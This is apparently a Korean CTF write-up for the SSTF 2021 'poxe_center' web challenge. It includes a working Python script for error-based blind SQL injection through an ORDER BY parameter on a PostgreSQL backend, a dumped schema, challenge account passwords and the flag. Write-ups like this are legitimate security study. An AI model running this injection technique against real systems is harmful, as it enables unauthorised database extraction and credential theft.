Profile

i love cat

as3617

SSTF 2021 - poxe_center writeup

들어가면 파라미터 2개가 있는데 두개 파라미터 모두에서 sql injection이 터진다.
order by뒤에서 터지는 건데 그냥 subquery로 행 여러개 리턴해서 500 error내는걸로 blind sql injection해주면 된다.

import requests
import sys
from urllib.parse import quote
import string
#string = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@-_$%^{}."
url = 'http://poxecenter.sstf.site:31888/demo/getGochaList?sortName=full_name&sortFlag=desc,'
data = ''

#################
#
#postgres
#template1
#template0
#pokedb
# - trainer_info
#   - trainer_id
#   - created_date
#   - first_name
#   - last_name
#   - full_name
#   - role
#   - assigned_city
#   - email
#   - level
#   - trainer_id
#   - is_activated
#   - password
# - poke_info
#   - index
#   - name
#   - first_attribute
#   - second_attribute
# - gotcha_poke
#   - trainer_id
#   - trainer_id?
#   - poke_name
#   - poke_nickname
#   - poke_level
#   - poke_status
#################

#######################
# user leak:
# email: xoxo@poxemon.com password: master12!@
# email: don@poxemon.com password: ZFLIP3
# email: password: dong0011
# 
# poke_info:
# Beubeseur
# Ceterpee
# Vulturb
# Electrude
# Exaggcuta
# Exeggutur
# Cubune
# Meruwek
# Hetmunlee
# Hetmunchen
# Lecketung
# Kuffeng
# Metepud
# ....
####################
i = 0
print("[*] Leak start")
while True:
    i += 1
    for j in string.printable:
        query = "(select 1 from pg_user where (ascii(substr((select STRING_AGG(DISTINCT second_attribute,',') from poke_info),"+str(i)+",1))="+str(ord(j))+"))"
        res = requests.get(url+quote(query))
        sys.stdout.write("\r%d : %s" % (i,data+j))
        sys.stdout.flush()
        if res.status_code == 500:
            data += str(j)
            break
        else:
            continue

sleep이 작동하지 않고 if가 없으며 version()함수는 존재하길래 postgresql이라 생각하고 공격을 진행했다. database가 굉장히 큰데
디스크립션에서 전설의 포켓몬 머시기라고 이야기하고 있길래 poke_info database에 플래그가 있을거라 생각하고 공격을 진행했다.

FLAG : SCTF{G0tcH4_Gh0sT_c4t_iS_L3G3ND4Ry_P0k3}

'ctf writeup' 카테고리의 다른 글

2021 Whitehat Contest Finals web writeup  (0) 2021.10.10
corCTF 2021 - mathme writeup  (0) 2021.08.24
IJCTF 2021 Memory  (0) 2021.07.25
Google CTF 2021 - LETSCHAT [web]  (4) 2021.07.19
0CTF/TCTF 2021 Quals - 1linephp [web]  (0) 2021.07.05